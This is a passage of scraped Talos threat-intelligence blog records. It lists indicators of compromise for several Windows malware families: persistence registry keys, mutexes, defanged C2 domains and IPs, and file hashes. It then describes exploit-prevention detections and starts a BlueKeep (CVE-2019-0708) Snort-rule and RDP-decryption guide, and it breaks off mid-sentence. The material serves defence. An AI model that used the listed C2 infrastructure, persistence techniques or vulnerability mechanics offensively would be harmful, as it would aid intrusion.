\n---|--- \n`ip-api[.]com` | 25 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}` | 25 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\Component_00` | 25 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\Component_01` | 25 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\Component_03` | 25 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\fsutil.lnk` | 2 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\fsutil.exe` | 2 \n`%System32%\\Tasks\\fsutil` | 2 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\logman.lnk` | 2 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\logman.exe` | 2 \n`%System32%\\Tasks\\logman` | 2 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\odbcconf.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\odbcconf.exe` | 1 \n`%System32%\\Tasks\\javaws` | 1 \n`%System32%\\Tasks\\logagent` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\ARP.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\ARP.EXE` | 1 \n`%System32%\\Tasks\\perfhost` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\perfhost.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\perfhost.exe` | 1 \n`%System32%\\Tasks\\EhStorAuthn` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\verclsid.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\verclsid.exe` | 1 \n`%System32%\\Tasks\\verclsid` | 1 \n`%System32%\\Tasks\\rasautou` | 1 \n`%System32%\\Tasks\\mfpmp` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0c7e5bb1cee76e9863ce3b44c24eec38b1eb92892c5b60a833982516a54e9b76 28374ce7589aacac9039559d75f55b2fc82976fbb26e9fcbd4932ae9fba0ff59 358ef9b233660e1630b16cb46e59ca4e8e568aba5d18d2011d01531831656a4f 49b45cd004664bfa865adf65e6f0721c32e26855854ae36e1edbf807c70f6bda 52b992d21becd7be682c2922364a752c8175ef0061a7acd6f4edc077f80e82b1 5602333889bbd3667cb416a50968d930d482b2c85ceb1bea928378118f582d8a 622889cf94266b040d5fc4b648c5010da452d773d6af23eb6d92ef087e885de0 63920b6de768c6e2b2168c51b1e37ade32c2963c9ab270298a6a2c41d413b81f 674fabcda596680972f25c7a01401805f612211a6949231b6b0b51a7b4dc4bb6 75b7b2dbc574900f135e4b0e640ab9ba649309a8d6ad8dee502f24a777873bcf 79ad8ad6a72e5014dee5f21dc71d8dbb580aa2214f39680d990e5f9fae2c033a 80376654651c543804118148246ba881732d1c03312f3a5966bc750a5b9323d0 807a64e31851a9e6b31b848e8cf3f98aee708c3f9fb202083380dbb6c01e1ab6 90a475321d0b15ea933d816290542ba4eaf96b24275d5ad89f54f2e2986a1c6e 91c10c1d3338faa90223e12db01178109fee544d1cdd598c9e6eb2441df372df a36b78449ee435b25af5f6af94ef15831ad257e5d311ebb21d5ed65fb13ac9d3 b54d186c102b61025a31209381847c9a92cbcc3de0180b85c1acd14eaf4543ac c4a92d2271b389d943298c11e93283ea32565956a7d36497de0efdbc41c050c5 c51909551fe0e12ac55b976834ec5e529819b9865afa470bc39ca19ebc50855f d85fd7e3a234d353f00bb58d8630e67de2e654ce33fbe13e1a11c74f3840ebdd db39d08dd5b947bff9410e63a7a120aea4ea8c466af50ffc14c42e8d19df14c8 de64250a40802d3495fa2b0d6deac9ea159652e4e7b3c52d54abe55d986f0973 e6e307c6d4abeb1aa62f20c16cd0bf9cfc667ee945d4e6e7332e475d922c70af e6fa6eca90b0231944129a2b9573ac03c019a788f91044cc50e743b0dd0fd9fa f75b4f1eb4715ad1f6289df06ae3f1ef5e992fa36e4cdebd27ccdb6106945076 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-KH8Ebadzxj8/XiIxOnUtkrI/AAAAAAAADJE/hh-8IwESxrEQiePz6oEZZyOpmTyRlXPwwCLcBGAsYHQ/s1600/a36b78449ee435b25af5f6af94ef15831ad257e5d311ebb21d5ed65fb13ac9d3_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-2hgJ5eNsa_k/XiIxSHr2ZeI/AAAAAAAADJM/OW8A9qAZTB8c2xe9T0XX-T7kxg1NxvWTQCLcBGAsYHQ/s1600/a36b78449ee435b25af5f6af94ef15831ad257e5d311ebb21d5ed65fb13ac9d3_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Barys-7532466-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: Hidden ` | 26 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: dbe70bc52631c4df155a4a1a865cf25d ` | 26 \n`<HKCU>\\SOFTWARE\\SHORTCUTINFECTION \nValue Name: NOiR ` | 14 \n`<HKCU>\\SOFTWARE\\SHORTCUTINFECTION ` | 14 \nMutexes | Occurrences \n---|--- \n`~[P6Er7#4$&WJr83!]~` | 26 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`41[.]38[.]1[.]86` | 1 \n`141[.]255[.]155[.]177` | 1 \n`41[.]239[.]65[.]189` | 1 \n`206[.]189[.]182[.]212` | 1 \n`178[.]80[.]27[.]0` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`b10j[.]ddns[.]net` | 1 \n`uploadapk[.]ddns[.]net` | 1 \n`anadnjwan[.]zapto[.]org` | 1 \n`xmu51k[.]ddns[.]net` | 1 \n`youssefassd1[.]hopto[.]org` | 1 \n`clivou[.]ddns[.]net` | 1 \n`hack-qi[.]no-ip[.]info` | 1 \n`camifer93[.]ddns[.]net` | 1 \n`ronaldo20[.]no-ip[.]org` | 1 \n`zabanahacker[.]no-ip[.]org` | 1 \n`magicfuny12[.]publicvm[.]com` | 1 \n`badr123[.]ddns[.]net` | 1 \n`level[.]publicvm[.]com` | 1 \n`rostom071995[.]ddns[.]net` | 1 \n`microsoftstores[.]sytes[.]net` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\svchost.exe` | 26 \n`%TEMP%\\DarkData.dat` | 26 \n`%HOMEPATH%\\Start Menu\\Programs\\Startup\\svchost.exe` | 21 \n`%TEMP%\\Microsoft` | 18 \n`%TEMP%\\Microsoft\\svchost.exe` | 18 \n`\\autorun.inf` | 13 \n`E:\\<random, matching '[a-z]{4,7}'>.exe` | 12 \n`%TEMP%\\dw.log` | 9 \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 9 \n`%LOCALAPPDATA%\\WOrm.exe` | 6 \n`%APPDATA%\\Microsoft\\Windows\\Cookies\\WOrm.exe` | 6 \n`%APPDATA%\\Microsoft\\Windows\\Network Shortcuts\\WOrm.exe` | 6 \n`%APPDATA%\\Microsoft\\Windows\\Printer Shortcuts\\WOrm.exe` | 6 \n`%APPDATA%\\Microsoft\\Windows\\Recent\\WOrm.exe` | 6 \n`%APPDATA%\\Microsoft\\Windows\\SendTo\\WOrm.exe` | 6 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\WOrm.exe` | 6 \n`%APPDATA%\\Microsoft\\Windows\\Templates\\WOrm.exe` | 6 \n`\\<random, matching '[a-z]{4,7}'>.exe` | 6 \n`%HOMEPATH%\\AppData\\WOrm.exe` | 6 \n`%APPDATA%\\WOrm.exe` | 6 \n`%HOMEPATH%\\Contacts\\WOrm.exe` | 6 \n`%HOMEPATH%\\Cookies\\WOrm.exe` | 6 \n`%HOMEPATH%\\Desktop\\WOrm.exe` | 6 \n`%HOMEPATH%\\Documents\\My Music\\WOrm.exe` | 6 \n`%HOMEPATH%\\Documents\\My Pictures\\WOrm.exe` | 6 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 004e01f888cb6241fc7da95d1798830ed0c52ea179b1ed0b2f71598e7d83fdc4 006261e3d8b0d00ae9f6596dd914440a19b1b0ab333533c03fd75c3e63f07f0d 022d2461933a4aafe67d8ddb3c5fd7f14eea9035dec79bea200ff1d57776762d 02de146284642091fd6104b2a09a0a5ffc92d51c28e8c492acecbd39fb0c30e0 033645d3516e2f25ddb3566c1eed8a6be6d3c023f7f0e98c868efa12483dfac3 04ce16123c1db27009dfd8a2546810c881a22b6eeed4697d64cb44af2e69e75d 0780a44389bf1a4cde74cc26d87cf3ee10ab0f19ba75dc941abacb0939f6c0fd 085a78af5d0146251a13bc743866fe4292d84a6c0753c6e6fcbb91d2c7826dfe 0887bb1422d2b1a80b0912816d2e776afe9db36ae392887c30dffb6950b39190 08d8cf4bd5635a6930758f7736259f230ff559ede4880d044aa4eaed47f37115 0b0c9946d82dba06fceda4ce8a8f2a8ad828adba44e630f4652a5784d4305e5c 0c85f4b989930dd44f791828bad61061e8ff325142e1dd275fa30295a343c051 0d638e32faab7502716a78610e97a4c55974ff1c648784aa66294f1e594cbe1f 0de13ccba02abce52ee48511d094b474fbf8807aa54ea316f86a83befe85a1b6 1081f90d1fa09214611b5e0255d714db254f502e945069e93973eb0f63d00208 12bd605a3b68b17d0279e5fd34cb2c9dee540f4eb1b248447d101c9199ebfaf5 12f1c270b4df8c8baa2eb194f85267da965450cf35696644d71d3835a3905e1b 13c397c69dd1c2357af059f5760a551567834c836b6d124e4e1ffee085feda80 1493472fd451f1109f5c245245469e6882f92d34610a6c468e3af5dd9acdac89 17b64ea8a52fce27bcd439a2762f6a8dff4235c10ca99a60722e481509e42b0b 1888096d2e773f3e1377ee329bf649d0032e384badd451731cc1f6cf7eb924ce 18a5f4a28bd04a9e6b7283aa80bfe4649e48cac3592f72fed511e10935c80678 18f55fa2f805d9a0aa51b6c6e934b9ea14d4c63fb578811dad1d7816e5758b71 1962b11c5701a4b591c219a30164708e42bad73e72a58b5896cfa48c0ad20ed5 1a91bfeb723c4ad729eea5e22da6f8afeecbdb990a18c3272e1fc92d7c94bdae `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-fgb3pvwEXlE/XiIxgdtAs2I/AAAAAAAADJQ/RjZ8gdZK6nYyTdIFPzGYXSl84K5tOndqQCLcBGAsYHQ/s1600/04ce16123c1db27009dfd8a2546810c881a22b6eeed4697d64cb44af2e69e75d_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-0VtSwWcmMpY/XiIxkxPIA6I/AAAAAAAADJU/OKID_zPptEIITjGHeUT0_Z3jsrr_pGjrgCLcBGAsYHQ/s1600/2bd3451c8410d9d8d34470eb2d49c7061584ef1bebb31cadd4dc10e3e7ad31b0_tg.png>)\n\n \n\n\n#### Malware\n\n[](<https://1.bp.blogspot.com/-51RmBbmX5dw/XiIxpg16sLI/AAAAAAAADJY/z31ZelV58-kop45RA8Q2DM_09yaLuE2_gCLcBGAsYHQ/s1600/04ce16123c1db27009dfd8a2546810c881a22b6eeed4697d64cb44af2e69e75d_malware.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Razy-7532659-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\7E3975E4EF230D7D9195 ` | 4 \n`<HKCU>\\SOFTWARE\\7E3975E4EF230D7D9195 \nValue Name: 7E3975E4EF230D7D9195 ` | 4 \n`<HKCU>\\ENVIRONMENT \nValue Name: SEE_MASK_NOZONECHECKS ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: ParseAutoexec ` | 2 \n`<HKCU>\\SOFTWARE\\FECBD0A484C99B705CF7099E6CE11887 ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: fecbd0a484c99b705cf7099e6ce11887 ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: fecbd0a484c99b705cf7099e6ce11887 ` | 2 \n`<HKCU>\\SOFTWARE\\FECBD0A484C99B705CF7099E6CE11887 \nValue Name: [kl] ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\AUTOUPDATE \nValue Name: LastSyncTime ` | 1 \nMutexes | Occurrences \n---|--- \n`fca-1de3ff845109` | 4 \n`jicaltapntot` | 3 \n`gfgdgdfdgfggfdgfdgbfdbgdfbgdfbgfdbgdfbgdfbgdfbgdfbgdfgbdfgbdfgdfbdgfbgdfbgdfbgdbfgbdfdgbfgbfdvbvdgfdgfbvgdbfvdgfbvdgfvb` | 2 \n`fecbd0a484c99b705cf7099e6ce11887` | 2 \n`022-1b90e6b10b98` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`51[.]15[.]40[.]85` | 17 \n`177[.]75[.]44[.]41` | 3 \n`177[.]75[.]44[.]147` | 2 \n`169[.]254[.]255[.]255` | 1 \n`72[.]21[.]81[.]240` | 1 \n`104[.]20[.]68[.]143` | 1 \n`104[.]20[.]67[.]143` | 1 \n`109[.]202[.]107[.]15` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`rentry[.]co` | 17 \n`jhonjhon4842[.]ddns[.]net` | 5 \n`pastebin[.]com` | 2 \n`ctldl[.]windowsupdate[.]com` | 1 \n`noregisterdomain[.]zapto[.]org` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\explorer.exe` | 3 \n`%TEMP%\\explorer.exe` | 2 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\fecbd0a484c99b705cf7099e6ce11887.exe` | 2 \n \n#### File Hashes\n\n` 04c3f0070bc08bafddfeb011497eb893c37f63397b535dcedee9e5ac89e246c3 0e754a806b2813874c47332e98a8c118bd1e33508b44ff0081ac36a48814d769 120924a5852db8a4333cf74fc1f067f51a70a996de994bc4ce727ff1377f6023 16ca75f09433409d790695af612f4ee560c265f3f084b6dc04bcbebff2ebe964 3a1a6f80ea8aa66ce456ab0cd452ad38e12b3c904432fedb5a0242c987f84c81 4ca2e3f2272455e38269d69d20dbb16c1572befe8b81a92c4acdae93341549d2 5c4dee777eb540663373b08b31b5d69d52fe9108317b21b697ea2487a2b8621d 747b1a101bb3a43a6c0b58fb8a50d8ac9777ea704911e7df27edf8c81ead883e 7f85c722bf97008aafd593730ccf252318ffb8ad00645aa0e13eab7d76c96687 8953d845fe687b2a8c5e92a0a7b2aa9dcb5c61dd271983194ef300476faee3de 95384877ed6e9a9e726ff1d18bd0fd137160e4943e0bebe59c7f7a8bfd3b25d8 b58590a3a09129a3a1e55195b0f1a39bb278a4ee1c21257aa2d74b425f09e649 c679ac377cc06ef337c78bcd3882b4e0ad5023d9649c1e37296f98252573bd57 d2e84fc71ada0566834f9dcd871b927c3e52603b73cf2bc0d923fbba79fc205f db7f08e2ae8fdb796d8420ef16ef539f2c8fe24ddabadf5a46cc7148b5c50e8a ded370384b5abe048734193ae8281852d2f68cf93cdec658bb0047ed7314c9a6 efa4ffb921031f5c2cd960f2d24e56140dd2c0d549e2a7b2ea69e4ab0cb47dae f24917e59deff96fe4107de88d80815c5aa45d3e7aa711ad772ea031bcfdcc1d f5c8e5e5303aedd99923c610e3b0ecd34095fdff10ae120d1be6648c5bdc3e89 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-eU-xaKLp84Y/XiIx70iv7jI/AAAAAAAADJk/JLJuW1qVwIMcHQmwwI8Dmyo6aHbDjc91QCLcBGAsYHQ/s1600/db7f08e2ae8fdb796d8420ef16ef539f2c8fe24ddabadf5a46cc7148b5c50e8a_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-G1FNrSD8osM/XiIx_qDj2WI/AAAAAAAADJo/5rM-Q2nRDZM8VSESeSTrCL6QXpV-oLXhwCLcBGAsYHQ/s1600/db7f08e2ae8fdb796d8420ef16ef539f2c8fe24ddabadf5a46cc7148b5c50e8a_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-rnF_8yn3aCE/XiIyEeb9XGI/AAAAAAAADJs/F9_v9eKTP8QxmNq33fOqfyiWlNBHlkEBACLcBGAsYHQ/s1600/0e754a806b2813874c47332e98a8c118bd1e33508b44ff0081ac36a48814d769_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Dridex-7532883-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: trkcore ` | 12 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: DisableTaskMgr ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0 \nValue Name: CheckSetting ` | 12 \nMutexes | Occurrences \n---|--- \n`bxHV8AirRi` | 1 \n`nN6zSKd5De` | 1 \n`1aGmpK2Fpc` | 1 \n`7hIVwzEnv1` | 1 \n`E6Q6j6YTV8` | 1 \n`Irun61Xn7d` | 1 \n`JLSADdwil0` | 1 \n`NPXzzJejTH` | 1 \n`WWN630213P` | 1 \n`XPF1tOcJMb` | 1 \n`2WpU6TmEPW` | 1 \n`3ZJhaY3yr9` | 1 \n`5he85143TO` | 1 \n`KjY7CSFqPz` | 1 \n`R9uXS0pi9F` | 1 \n`TV4I4E35W8` | 1 \n`eDiPKSpzC6` | 1 \n`yebXkefg8w` | 1 \n`CCbi4gfgIs` | 1 \n`OuaMk6vUKi` | 1 \n`RiFp6vyARh` | 1 \n`W6ArquGVYc` | 1 \n`cLgrRVqAOx` | 1 \n`rw74rlool5` | 1 \n`vxudb0VN9b` | 1 \n \n*See JSON for more IOCs\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`172[.]217[.]11[.]46` | 12 \n`104[.]20[.]67[.]143` | 7 \n`104[.]20[.]68[.]143` | 5 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`pastebin[.]com` | 12 \n`www[.]4zjjwywndb[.]com` | 1 \n`www[.]wyek9gljwv[.]com` | 1 \n`www[.]dhpydj8zow[.]com` | 1 \n`www[.]xy5xc1pa3f[.]com` | 1 \n`www[.]dw4kr1pwbg[.]com` | 1 \n`www[.]bz11msxwlf[.]com` | 1 \n`www[.]65vxrzb8us[.]com` | 1 \n`www[.]qiht7hodpf[.]com` | 1 \n`www[.]gfuhlqwl2q[.]com` | 1 \n`www[.]xdctdxp8w3[.]com` | 1 \n`www[.]hfhfl9jloc[.]com` | 1 \n`www[.]gvkkyn2d5c[.]com` | 1 \n`www[.]womizyhbm9[.]com` | 1 \n`www[.]zboz6h96hz[.]com` | 1 \n`www[.]ssgj6cpx0k[.]com` | 1 \n`www[.]rpy91utwrm[.]com` | 1 \n`www[.]qeqvtkjksw[.]com` | 1 \n`www[.]0ac8n2n5zb[.]com` | 1 \n`www[.]eagzu4rlpm[.]com` | 1 \n`www[.]0rfabtbv2r[.]com` | 1 \n`www[.]abzze96jtg[.]com` | 1 \n`www[.]wfajyuswse[.]com` | 1 \n`www[.]d4ktsdbuhr[.]com` | 1 \n`www[.]ep2iu65g3l[.]com` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 05afedd0b76f574373f858b854958c473482fcc6fa9736f0d447094605ad2102 0a3079b8c4963b26e74760337da6cb0b1a6c532cc524f4d0aae6dab1d52f7d75 0a4e162d4a11aa91ead63995af22c410b422b8b5af2038d4ef95d454c1d380e1 0f4f25d12a2729552a348fb33cd7374fbd5ce3bc53c8da873f3aa5026a7290ca 33991dbeb097cb0937ae9ea049418089b3437e7f4ef23cbcf26b906b1ab39d5b 79d11b3634c5a3dc51442b4e8cdf88d921f9d46273a55ac20cd1fa7d0d51c11d 919119268cb2b13ae638c6015822352d899cc39ea10959a86634c8bd2fc8912b 940eaff21163abfe8be6301e561e30a27f23800cb8bfe4a5df9a5ff7dbfb1d4f a31fdd57bc317cd8f6c4df0c6f75bcd25999d36f7cc665da9018672dfe55061c b5d15bb5d2a6bde41040d4b9d63e8cc1cfddf8669f5c1389c2aba584328dc27b e45c5802e6091e4602519853d81ad08f45969d574cfa3d1e36a6af8bd0daaaf7 f3475d70597f4f77ab542f79c295c120094f9dc35bddb706bfb80b1e8787a061 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-SZ-VrEa38rw/XiIySm0SjyI/AAAAAAAADJ0/zfyXN9AUVHccvfIbFMN6ASwxZtphlhoUgCLcBGAsYHQ/s1600/05afedd0b76f574373f858b854958c473482fcc6fa9736f0d447094605ad2102_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-GpMbeK_HK8I/XiIyX4bvVCI/AAAAAAAADJ8/ru4-fDcdqLs8-8ZKOzBAqX2YM9hV9woBQCLcBGAsYHQ/s1600/05afedd0b76f574373f858b854958c473482fcc6fa9736f0d447094605ad2102_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (22771) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nProcess hollowing detected \\- (394) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nExcessively long PowerShell command detected \\- (304) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nKovter injection detected \\- (181) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nDealply adware detected \\- (147) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nGamarue malware detected \\- (141) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nInstallcore adware detected \\- (125) \nInstall core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nCorebot malware detected \\- (22) \nCorebot is a Trojan with many capabilities found in other prominent families. It features a plugin system to enable it to load a variety of features from the C&amp;C server at any time. Known plugins include RAT capabilities such as taking desktop screenshots, as well as being able to intercept and modify browser communications and steal data, especially data related to banking. \nFusion adware detected \\- (13) \nFusion (or FusionPlayer) is an adware family that displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware is known to sometimes download and install malware. \nIcedID malware detected \\- (10) \nIcedID is a banking Trojan. It uses both web browser injection and browser redirection to steal banking and/or other financial credentials and data. The features and sophistication of IcedID demonstrate the malware author's knowledge and technical skill for this kind of fraud, and suggest the authors have previous experience creating banking Trojans. IcedID has been observed being installed by Emotet or Ursnif. Systems infected with IcedID should also be scanned for additional malware infections. \n \n", "modified": "2020-01-17T14:55:21", "published": "2020-01-17T14:55:21", "id": "TALOSBLOG:340B43701E5CA96D8B4491CD801FE010", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/U32MSyxPJMs/threat-roundup-0110-0117.html", "type": "talosblog", "title": "Threat Roundup for January 10 to January 17", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-10T18:23:29", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0708"], "description": "_This blog was authored by Brandon Stultz_ \n\n\n[](<https://1.bp.blogspot.com/-aIaIKQNZ3jY/XPGLyz8E9XI/AAAAAAAAByg/VSt-cziNmMUzOMGKj_GUYM5vpa_1LIT1wCLcBGAs/s1600/Vulnerability%2BSpotlight.jpg>)\n\nMicrosoft recently released fixes for a critical pre-authentication remote code execution vulnerability in Remote Desktop Protocol Services (RDP). Identified as CVE-2019-0708 in [May's Patch Tuesday](<https://blog.talosintelligence.com/2019/05/MS-Patch-Tuesday-May-2019.html>), the vulnerability caught the attention of researchers and the media due to the fact that it was \"wormable,\" meaning an attack exploiting this vulnerability could easily spread from one machine to another. This was discussed at length in [episode 54](<https://blog.talosintelligence.com/2019/05/beers-with-talos-ep-54-patch-after.html>) of our 'Beers with Talos' podcast. \n \nCisco Talos started reverse-engineering work immediately to determine how exactly RDP was vulnerable. Talos [wrote and released coverage](<https://blog.talosintelligence.com/2019/05/talos-releases-coverage-for-wormable.html>) as soon as we were able to determine the vulnerability condition. [SID 50137](<https://snort.org/advisories/talos-rules-2019-05-20>) for SNORT\u00ae correctly blocks exploitation of CVE-2019-0708 and scanning attempts that leverage this vulnerability. \n \nThis rule prevents exploitation of CVE-2019-0708 by blocking any RDP connection that attempts to use the \"MS_T120\" virtual channel. The RDP protocol defines virtual channels that can be used to transfer different kinds of data (e.g. clipboard, audio, etc.). In addition to these client-specified channels, Microsoft creates the \"MS_T120\" channel in the Windows RDP system. Clients are not expected to create the \"MS_T120\" channel. A remote unauthenticated attacker can exploit CVE-2019-0708 by sending crafted data to this internal channel. \n \n \nSince RDP servers are not aware of which virtual channels the client supports, the client provides a list of desired channels in the connect-initial packet at the start of the RDP session. \n \nClient --&gt; Connection Request --&gt; Server \nClient &lt;\\-- Connection Confirm &lt;\\-- Server \n\\-- Optionally switch transport to TLS -- \nClient --&gt; MCS connect-initial --&gt; Server \nClient &lt;\\-- MCS connect-response &lt;\\-- Server \n \nIt is possible to specify in the RDP connection request that the client is TLS capable. In most cases, this causes the server to switch the connection to TLS after the Connection Confirm packet. This means that [Cisco Firepower](<https://www.cisco.com/c/en/us/products/security/firepower-management-center/index.html>) will only scan the virtual channel list in the encrypted case if TLS decryption is set up for RDP. \n \nWhile the aforementioned Snort rule can help protect against BlueKeep, it is still possible for attackers to carry out an encrypted attack \u2014 essentially sneaking past users and remaining undetected. Unless users set up TLS decryption for RDP on their Firepower device, there is a chance an attacker could exploit CVE-2019-0708 to deliver malware that would have the potential to spread rapidly. \n \nThe following is a guide to set up RDP decryption on Cisco Firepower. This guide specifically applies to Windows Server 2008 instances (newer versions of Windows Server are not vulnerable to BlueKeep). Additionally, Windows 7 only allows setting up a custom RDP certificate in the registry. It is possible to export the self-signed RDP certificate and private key in Windows 7 but this requires using the mimikatz tool as the private key for the auto-generated certificate is marked as \"not exportable\". Considering these hurdles, we focused on Windows Server 2008 for this guide. \n \n_*Note this procedure requires an inline Firepower device that supports SSL decryption. For more information, visit: [Cisco Next-Generation Intrusion Prevention System (NGIPS) - Cisco](<https://www.cisco.com/c/en/us/products/security/ngips/index.html>)._ \n\n\n### Steps for RDP Decryption\n\n1\\. Determine the certificate used by the RDP server \nIn Windows Server 2008, TLS certificates for RDP are 